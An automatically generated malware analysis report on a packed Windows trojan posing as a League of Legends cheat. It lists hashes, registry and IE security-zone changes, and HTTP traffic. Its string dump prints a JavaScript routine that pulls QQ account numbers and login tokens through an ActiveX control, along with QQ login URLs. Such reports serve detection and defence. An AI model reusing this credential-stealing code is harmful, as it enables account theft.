Trojan.Generic.12421464_a5fd989980
Trojan.Generic.12421464 (B) (Emsisoft), Trojan.Generic.12421464 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: a5fd9899801e0eb320df3b222555351c
SHA1: 2d738e7736e22a5cfe30155cfe2755b07599f5d4
SHA256: ad87f7909649144ecc3de99e1a92148d362b70202595a02b6d12099de4da8a17
SSDeep: 196608:CT/lod2lf1eBkCUw2jp 0trmYmL3keSocgM0LNPy8DpZ C2Geyz/1fwDjiMMp7zg:06/HU9mY87Lcypr2w7zt55u
Size: 14594048 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: NsPackV2X, PolyEnE001byLennartHedlund, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2014-12-09 05:49:42
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
regsvr32.exe:212
regsvr32.exe:1116
The Trojan injects its code into the following process(es):
%original file name%.exe:1516
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
c:!documents and settings!adm!cookies!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex
File activity
The process %original file name%.exe:1516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\eylogin.dll (15021 bytes)
Registry activity
The process regsvr32.exe:212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 13 FA 09 98 17 9F 41 0C 3E FF 4B ED 48 FE FE"
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\EyLogin.EyLoginSoft\CurVer]
"(Default)" = "EyLogin.EyLoginSoft"
[HKCR\AppID\EyLogin.DLL]
"AppID" = "{29D16463-BCC9-4BD5-B4E7-07CB4AC0768A}"
[HKCR\EyLogin.EyLoginSoft\CLSID]
"(Default)" = "{C691BF80-87AF-43A7-AD56-28D5DA857FBD}"
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}\VersionIndependentProgID]
"(Default)" = "EyLogin.EyLoginSoft"
[HKCR\EyLogin.EyLoginSoft]
"(Default)" = "EyLoginSoft Class"
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}\TypeLib]
"(Default)" = "{B9096DAC-F8A6-4874-BDAC-C5A79217CE98}"
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}\ProgID]
"(Default)" = "EyLogin.EyLoginSoft"
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}\InprocServer32]
"(Default)" = "c:\eylogin.dll"
[HKCR\AppID\{29D16463-BCC9-4BD5-B4E7-07CB4AC0768A}]
"(Default)" = "EyLogin"
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}]
"(Default)" = "EyLoginSoft Class"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}]
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}\InprocServer32]
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}\VersionIndependentProgID]
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}\TypeLib]
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}\Programmable]
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}\ProgID]
The process regsvr32.exe:1116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 B9 E1 05 AA A4 95 CB 66 2D 1F 33 F2 7C 28 92"
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\EyLogin.EyLoginSoft\CurVer]
"(Default)" = "EyLogin.EyLoginSoft"
[HKCR\AppID\EyLogin.DLL]
"AppID" = "{29D16463-BCC9-4BD5-B4E7-07CB4AC0768A}"
[HKCR\EyLogin.EyLoginSoft\CLSID]
"(Default)" = "{C691BF80-87AF-43A7-AD56-28D5DA857FBD}"
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}\VersionIndependentProgID]
"(Default)" = "EyLogin.EyLoginSoft"
[HKCR\TypeLib\{B9096DAC-F8A6-4874-BDAC-C5A79217CE98}\1.0\HELPDIR]
"(Default)" = "c:"
[HKCR\TypeLib\{B9096DAC-F8A6-4874-BDAC-C5A79217CE98}\1.0]
"(Default)" = "EyLogin 1.0.2.5 ÀàÃÂÿâ"
[HKCR\TypeLib\{B9096DAC-F8A6-4874-BDAC-C5A79217CE98}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{B9096DAC-F8A6-4874-BDAC-C5A79217CE98}\1.0\0\win32]
"(Default)" = "c:\eylogin.dll"
[HKCR\Interface\{6C8E441E-B77B-44AF-BBDA-548EA8FF0638}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\EyLogin.EyLoginSoft]
"(Default)" = "EyLoginSoft Class"
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}\TypeLib]
"(Default)" = "{B9096DAC-F8A6-4874-BDAC-C5A79217CE98}"
[HKCR\Interface\{6C8E441E-B77B-44AF-BBDA-548EA8FF0638}]
"(Default)" = "IEyLoginSoft"
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}\ProgID]
"(Default)" = "EyLogin.EyLoginSoft"
[HKCR\Interface\{6C8E441E-B77B-44AF-BBDA-548EA8FF0638}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}\InprocServer32]
"(Default)" = "c:\eylogin.dll"
[HKCR\AppID\{29D16463-BCC9-4BD5-B4E7-07CB4AC0768A}]
"(Default)" = "EyLogin"
[HKCR\Interface\{6C8E441E-B77B-44AF-BBDA-548EA8FF0638}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{C691BF80-87AF-43A7-AD56-28D5DA857FBD}]
"(Default)" = "EyLoginSoft Class"
[HKCR\Interface\{6C8E441E-B77B-44AF-BBDA-548EA8FF0638}\TypeLib]
"(Default)" = "{B9096DAC-F8A6-4874-BDAC-C5A79217CE98}"
The process %original file name%.exe:1516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SYSTEM\»ÒÌ«Àǹ¤×÷ÊÒ]
"CD-KEY" = "XP638622D386316EB785"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1916x902x32(BGR 0)" = "31,31,31,31"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 0F 21 1D E8 54 35 2B 5D 9C 02 91 B8 D6 01 FD"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SYSTEM\»ÒÌ«Àǹ¤×÷ÊÒ]
"Óû§Ãû" = "Ãâ·ÑÓû§"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| 3bdb92b38bdc6a5702ec1454534d0951 | c:\eylogin.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: ??
Product Name: ?
Product Version: 7.7.2013.1
Legal Copyright: ?? ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 7.7.2013.1
File Description: ?????????
Comments: ??
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 1046347 | 1048576 | 4.52734 | f83c4ecee16fd6c601f028273cc068e5 |
| .rdata | 1052672 | 13358210 | 13361152 | 5.32512 | 683a86e78fd9842154b74bfab85ac0b9 |
| .data | 14413824 | 349962 | 90112 | 3.88242 | 62a8aa02f1afe986ae537a15018bc02d |
| .rsrc | 14766080 | 87588 | 90112 | 2.56701 | 1a2d9e1225e46f02ae268e63bf60a117 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://mglt.gaofangkongjianfree.info/sjk/ZF.txt | |
| hxxp://dslol.com/sjk/ZF.txt | |
| plugin.eydata.net |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Unsupported/Fake Windows NT Version 5.0
Traffic
GET /sjk/ZF.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: dslol.com
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 Nov 2015 15:35:20 GMT
Content-Length: 1177...<!doctype html>..<!--[if lt IE 7]> <html class="no-j
s ie6 oldie" lang="en"> <![endif]-->..<!--[if IE 7]>
<html class="no-js ie7 oldie" lang="en"> <![endif]-->..&l
t;!--[if IE 8]> <html class="no-js ie8 oldie" lang="en"> &
lt;![endif]-->..<!--[if gt IE 8]> <html class="no-js" lang
="zh_CN"> <!--<![endif]-->..<head>...<meta charse
t="utf-8">......<title>........................-VVV.dslol.com
</title>...<meta name="description" content="">...<meta
name="author" content="">...<meta name="viewport" content="widt
h=device-width,initial-scale=1">......<!-- CSS: implied media=al
l -->...<link rel="stylesheet" href="hXXp://VVV.dslol.com/css/st
yle.css">...<link rel="stylesheet" href="hXXp://VVV.dslol.com/cs
s/blue.css">...<script src="hXXp://VVV.dslol.com/js/jquery-1.6.2
.min.js"></script>...<script src="hXXp://VVV.dslol.com/js/
script.js"></script>..</head>..<body>...<div i
d="error-container">....<div id="error">.....<div id="pacm
an"></div>....</div>......<div id="container">...
..<div id="title">......<h1>........., ...................
........!</h1>.....</div>.........<h1>WWW.DSLOL.COM&
lt;/h1>.......</div>..........</span>.....</div>.
...</div>...</div>..</body>..</html>...
.<<< skipped >>>
GET /sjk/ZF.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: dslol.com
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 Nov 2015 15:35:20 GMT
Content-Length: 1177...<!doctype html>..<!--[if lt IE 7]> <html class="no-j
s ie6 oldie" lang="en"> <![endif]-->..<!--[if IE 7]>
<html class="no-js ie7 oldie" lang="en"> <![endif]-->..&l
t;!--[if IE 8]> <html class="no-js ie8 oldie" lang="en"> &
lt;![endif]-->..<!--[if gt IE 8]> <html class="no-js" lang
="zh_CN"> <!--<![endif]-->..<head>...<meta charse
t="utf-8">......<title>........................-VVV.dslol.com
</title>...<meta name="description" content="">...<meta
name="author" content="">...<meta name="viewport" content="widt
h=device-width,initial-scale=1">......<!-- CSS: implied media=al
l -->...<link rel="stylesheet" href="hXXp://VVV.dslol.com/css/st
yle.css">...<link rel="stylesheet" href="hXXp://VVV.dslol.com/cs
s/blue.css">...<script src="hXXp://VVV.dslol.com/js/jquery-1.6.2
.min.js"></script>...<script src="hXXp://VVV.dslol.com/js/
script.js"></script>..</head>..<body>...<div i
d="error-container">....<div id="error">.....<div id="pacm
an"></div>....</div>......<div id="container">...
..<div id="title">......<h1>........., ...................
........!</h1>.....</div>.........<h1>WWW.DSLOL.COM&
lt;/h1>.......</div>..........</span>.....</div>.
...</div>...</div>..</body>..</html>HTTP/1.1 4
04 Not Found..Content-Type: text/html..Server: Microsoft-IIS/7.5..<<< skipped >>>
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.rsrc
t%SVh
t$(SSh
~%UVW
u$SShe
ole32.dll
kernel32.dll
GdiPlus.dll
user32.dll
atl.dll
wininet.dll
Ole32.dll
ExitWindowsEx
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
MsgWaitForMultipleObjects
GetAsyncKeyState
EnumWindows
GetKeyboardState
MapVirtualKeyA
keybd_event
UnloadKeyboardLayout
GetKeyboardLayoutList
GetKeyboardLayout
ActivateKeyboardLayout
GetKeyboardLayoutNameA
RegOpenKeyA
RegDeleteKeyA
RegCloseKey
RegCreateKeyA
RegFlushKey
LoadKeyboardLayoutA
sZ6Qx.oW
=.AWYv
<0.wf
.No,p=
W.JPv
2.yaw
W.Zx)
4.Jd\T
ù^8/
.GD!p
QÞD
.exYx
.CL ^
%F:^p
.DSd3}
.EUP|
AU%D.
<.FB\
.Kg\N
.NURTA
2.Cx=
9AZ%X
UW.Rtq[%
-C.bf(
.KS!6
T$E)gc.dF
gExE
BL9av.ZA
aR.Sl
.bh!s
VtEXE
<_.Rp
d%x:_
Rc.KFg
.JY!i
.GW(Nc
JX.EFy
$xCz~%xS
|'.oH
$.Rp=2
.Nw'Gv
s;a.eWx
.Myyo
ct .RV
%ux:6
.}:%D
vE7U.FPv
"1%f^M
Q.Xy%.
uòD
&X%u<
òk4p
T.dYp
^}/.uF
6.Mki
.lCQS
3z$Q%xf
<(L%U
M.ku#
$.tva
Q6.QM
#}o.NU
hPftp"
cN.Xr.N
E%sRw5
x3.TK
:.Zfz
7x.jEiS
_4X%c
ÉG&
%1u8F
{w8%Fh.Xs].
.wA2]
:.vuWV
~>2`]%d
þ0[
,L.EF
P_õ00
J;*.DF
b.bo=
4eL-T}
-~}%d,Vps
*}%Uw
Q}.dQ!
.pZ`Z
iÄd452
7=-0-0-0-
6-0-0-0-
7aK_.zq9
.VGbS
*Go×
qSp?=.mx=
s.ZE4
ñZn
{"_M%Sk4S%C
\`2b%x
%dLPCF
u5}.bN
Z3.SF
E:/.BO5
t_.eI
g%Cne=T
|[%_"2"-
.lAeY
E.GA-
.fp^X
Vha%D
.eIGxq
%cSJZ
0.fRA
acmd]S
\,[%x
4}.TT
0AU%x4
%cUZL\
~GZ.oF-q=;
.Rcxh!C
.-.AR"
W5=G%d
>}%X8
%d$G]
dCrT
zul%u
q4.hk
2hz.ln
Gx%c<
%fk,z
.hLke
}{.oLMv%SJ
bg#%F
CrtO
|.JP8$7f
;P.tSG
!9.uB
Æ&"y
}.dU>
D&[%u
.pu0_0
|I.YeG
%s`Yr
%UOG0_
vUrL
.Ec\l
O.Ps,
}.Iy`
[{.iWJ_.CzD
^.Tr4
Xg%c&H
UþH(
.<`%9S
A%uj]
%U/'`4fj
,/.WE
( 9><^_~
.mr6t;&
Urlf{e|YQ-i}X
e%u92~$R
d%cHS
%.d6.
>c.cozo=
uò)
^O.oN
.GafC
.~.lJ
-HW}H
<_}"(=_=
.OoQqt
b3'.Cz
^.fxH
.mfgH`l
V,.pGl&F
%saG/
|Ik_'%u`
6.`.hm
.yzM*
|!-s}
n.PUH&
x=v.du
WxnFTP
g9q%x
V.Grg
ul.fhi
N7f%c
=%9ub
&W<.BY
.lChk
) _##_ `
,>.UU
w.Iv \'
.Pn\`
_r-y}
/b31z.vW
9p.fY
.bdlXG14
|Av`ýL
-.jc08
meHr.sNs
.llAF
*%csB
=.Nah
v.LmE!
.bS73
.Lzb!
e%xzQ
.ft:#
p$m.AW
Ò[`
%S TJ
9cH%c&a
.bX(
0.nX|
G8_k%d
~Wg.Uy
.cm7R
bT.XT
@qq.com
EasyWebSvr.exe
OD.exe
exeinfope.exe
Fucked.exe
eXeScope.exe
C32Asm.exe
PackAssist.exe
Hook.exe
Ollydbg.exe
\CD-KEY
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}UserAccountControlSettings.exe
%Program Files%\360\
%Program Files%\360\QQwky\
%Program Files%\Tencent\
\Game\LOLCRACK.dll
/Game\HID.dll
/Game\LOLHTCHINA.dll
/Game\ddraw.dll
\alipay\LOLCRACK.dll
\LOLHTCHINA.dll
csrrvar.exe
cttera.exe
xa.exe
$0;.xH*
^m).nGF
%X>#(
u.tE5
;/configs.ini
hXXp://dslol.com/sjk/ZF.txt
WWW.DSLOL.COM
hXXp://dslol.com/weijiaodailifei.htm
Indexer.dll
Indexer1.dll
LOLHTCHINA.exe
l.exe
xA.exe
\dte.dll
VVV.hack110.com
oO.wm]b
hXXp://hack110.taobao.com/
@&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
skey
VVV.hack110.com
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
qzreferrer=http://user.qzone.qq.com/
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
VVV.hack110.com
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
len = str.length; i < len; i) hash = (hash << 5) str.charCodeAt(i);
var t = QZONE.FormSender;
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {var a = QZFL.string.trim(fm.action);
a = (a.indexOf("?") > -1 ? "&": "?") "g_tk=" QZFL.pluginsDefine.getACSRFToken();fm.action = a
hXXp://why86958720.94.20080.info/
hXXp://dslol.com/xz.htm
\ .bat
%Program Files%\Oracle
%Program Files%\Oracle\VirtualBox
C:\LOLHT Configs v2\Kalista.ini
League of Legends.exe
/HID.dll
/LOLHTCHINA.dll
C:\LOLHT Configs v2\
\Game\hid.dll
.vmp0
`.vmp1
.reloc
@.rsrc
SHLWAPI.dll
'-kuY}N
dv%FP
n$8%D
Ez%q%f
KERNEL32.dll
GetProcessHeap
GetCPInfo
xmbox.dll
l.oaF
CMDW
.AC(j
A.mV?
.kf00
YcH%f
{%x|DUSER32.dll
hXXp://VVV.usertrust.com1
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl0)
'hXXp://ocsp1.wosign.com/class2/code/ca106
*hXXp://aia1.wosign.com/class2.code.ca1.cer07
&hXXp://crls1.wosign.com/ca1-code-2.crl0G
hXXp://VVV.wosign.com/policy/0
!Certification Authority of WoSign0
hXXp://crls1.wosign.com/ca1.crl0g
hXXp://ocsp1.wosign.com/ca10.
"hXXp://aia1.wosign.com/ca1-tsa.cer0
6hXXp://crl.trust-provider.com/UTN-USERFirst-Object.crl0:
hXXp://ocsp.trust-provider.com0
hXXp://crls1.wosign.com/ca1.crl0o
hXXp://ocsp1.wosign.com/ca106
*hXXp://aia1.wosign.com/ca1-class2-code.cer0
hXXp://VVV.521xm.com0
!Certification Authority of WoSign
@.reloc
^}•D
__MSVCRT_HEAP_SELECT
IMM32.dll
imehost.dll
ImeProcessKey
Windows
:):3:9:|:
= =$=(=,=0=4=8=
? ?$?(?,?
.ALeague of Legends (TM) Client
\TCLS\Client.exe
\Game\League of Legends.exe
MonkeyKing
xzs.exe
C:\LOLHT Configs v2\Amumu.ini
C:\LOLHT Configs v2\dashen.ini
C:\LOLHT Configs v2\Anivia.ini
C:\LOLHT Configs v2\Annie.ini
C:\LOLHT Configs v2\AnnieTibbers.ini
C:\LOLHT Configs v2\Ashe.ini
C:\LOLHT Configs v2\Azir.ini
C:\LOLHT Configs v2\Blitzcrank.ini
C:\LOLHT Configs v2\Brand.ini
C:\LOLHT Configs v2\Caitlyn.ini
C:\LOLHT Configs v2\Cassiopeia.ini
C:\LOLHT Configs v2\Chogath.ini
C:\LOLHT Configs v2\Corki.ini
C:\LOLHT Configs v2\Darius.ini
C:\LOLHT Configs v2\delevin.ini
C:\LOLHT Configs v2\Diana.ini
C:\LOLHT Configs v2\Draven.ini
C:\LOLHT Configs v2\DrMundo.ini
C:\LOLHT Configs v2\Elise.ini
C:\LOLHT Configs v2\EliseSpiderling.ini
C:\LOLHT Configs v2\Evelynn.ini
C:\LOLHT Configs v2\Ezreal.ini
C:\LOLHT Configs v2\FiddleSticks.ini
C:\LOLHT Configs v2\Fiora.ini
C:\LOLHT Configs v2\Fizz.ini
C:\LOLHT Configs v2\Galio.ini
C:\LOLHT Configs v2\Gangplank.ini
C:\LOLHT Configs v2\Garen.ini
C:\LOLHT Configs v2\Gnar.ini
C:\LOLHT Configs v2\GolemODIN.ini
C:\LOLHT Configs v2\Gragas.ini
C:\LOLHT Configs v2\Graves.ini
C:\LOLHT Configs v2\Hecarim.ini
C:\LOLHT Configs v2\Heimerdinger.ini
C:\LOLHT Configs v2\Irelia.ini
C:\LOLHT Configs v2\Janna.ini
C:\LOLHT Configs v2\JarvanIV.ini
C:\LOLHT Configs v2\Jax.ini
C:\LOLHT Configs v2\Jayce.ini
C:\LOLHT Configs v2\Jinx.ini
C:\LOLHT Configs v2\Karma.ini
C:\LOLHT Configs v2\Karthus.ini
C:\LOLHT Configs v2\Kassadin.ini
C:\LOLHT Configs v2\Katarina.ini
C:\LOLHT Configs v2\Kayle.ini
C:\LOLHT Configs v2\Kennen.ini
C:\LOLHT Configs v2\KhaZix.ini
C:\LOLHT Configs v2\KogMaw.ini
C:\LOLHT Configs v2\Leblanc.ini
C:\LOLHT Configs v2\Leesin.ini
C:\LOLHT Configs v2\Leona.ini
C:\LOLHT Configs v2\Lissandra.ini
C:\LOLHT Configs v2\Lucian.ini
C:\LOLHT Configs v2\Lulu.ini
C:\LOLHT Configs v2\Lux.ini
C:\LOLHT Configs v2\Malphite.ini
C:\LOLHT Configs v2\Malzahar.ini
C:\LOLHT Configs v2\Maokai.ini
C:\LOLHT Configs v2\MasterYi.ini
C:\LOLHT Configs v2\MissFortune.ini
C:\LOLHT Configs v2\Monkeyking.ini
C:\LOLHT Configs v2\Mordekaiser.ini
C:\LOLHT Configs v2\Morgana.ini
C:\LOLHT Configs v2\Nami.ini
C:\LOLHT Configs v2\Nasus.ini
C:\LOLHT Configs v2\Nautilus.ini
C:\LOLHT Configs v2\Nidalee.ini
C:\LOLHT Configs v2\Nocturne.ini
C:\LOLHT Configs v2\Nunu.ini
C:\LOLHT Configs v2\Olaf.ini
C:\LOLHT Configs v2\Orianna.ini
C:\LOLHT Configs v2\Pantheon.ini
C:\LOLHT Configs v2\Poppy.ini
C:\LOLHT Configs v2\Quinn.ini
C:\LOLHT Configs v2\Rammus.ini
C:\LOLHT Configs v2\Renekton.ini
C:\LOLHT Configs v2\Rengar.ini
C:\LOLHT Configs v2\Rivan.ini
C:\LOLHT Configs v2\Riven.ini
C:\LOLHT Configs v2\Rumble.ini
C:\LOLHT Configs v2\Ryze.ini
C:\LOLHT Configs v2\Sejuani.ini
C:\LOLHT Configs v2\Shaco.ini
C:\LOLHT Configs v2\Shen.ini
C:\LOLHT Configs v2\Shyvana.ini
C:\LOLHT Configs v2\Singed.ini
C:\LOLHT Configs v2\Sion.ini
C:\LOLHT Configs v2\Sivir.ini
C:\LOLHT Configs v2\Skarner.ini
C:\LOLHT Configs v2\Sona.ini
C:\LOLHT Configs v2\Soraka.ini
C:\LOLHT Configs v2\Swain.ini
C:\LOLHT Configs v2\Syndra.ini
C:\LOLHT Configs v2\Talon.ini
C:\LOLHT Configs v2\Taric.ini
C:\LOLHT Configs v2\Teemo.ini
C:\LOLHT Configs v2\Thresh.ini
C:\LOLHT Configs v2\Tristana.ini
C:\LOLHT Configs v2\Trundle.ini
C:\LOLHT Configs v2\Tryndamere.ini
C:\LOLHT Configs v2\TwistedFate.ini
C:\LOLHT Configs v2\Twitch.ini
C:\LOLHT Configs v2\Udyr.ini
C:\LOLHT Configs v2\Urgot.ini
C:\LOLHT Configs v2\Varus.ini
C:\LOLHT Configs v2\Vayne.ini
C:\LOLHT Configs v2\Veigar.ini
C:\LOLHT Configs v2\VelKoz.ini
C:\LOLHT Configs v2\Vi.ini
C:\LOLHT Configs v2\Viktor.ini
C:\LOLHT Configs v2\Vladimir.ini
C:\LOLHT Configs v2\Volibear.ini
C:\LOLHT Configs v2\Warwick.ini
C:\LOLHT Configs v2\Xerath.ini
C:\LOLHT Configs v2\XinZhao.ini
C:\LOLHT Configs v2\Yasuo.ini
C:\LOLHT Configs v2\Yorick.ini
C:\LOLHT Configs v2\Zac.ini
C:\LOLHT Configs v2\Zed.ini
C:\LOLHT Configs v2\Ziggs.ini
C:\LOLHT Configs v2\Zilean.ini
C:\LOLHT Configs v2\Zyra.ini
C:\LOLHT Configs v2\Aatrox.ini
C:\LOLHT Configs v2\Ahri.ini
C:\LOLHT Configs v2\Akali.ini
C:\LOLHT Configs v2\Alistar.ini
%S4WD
hg%fpM
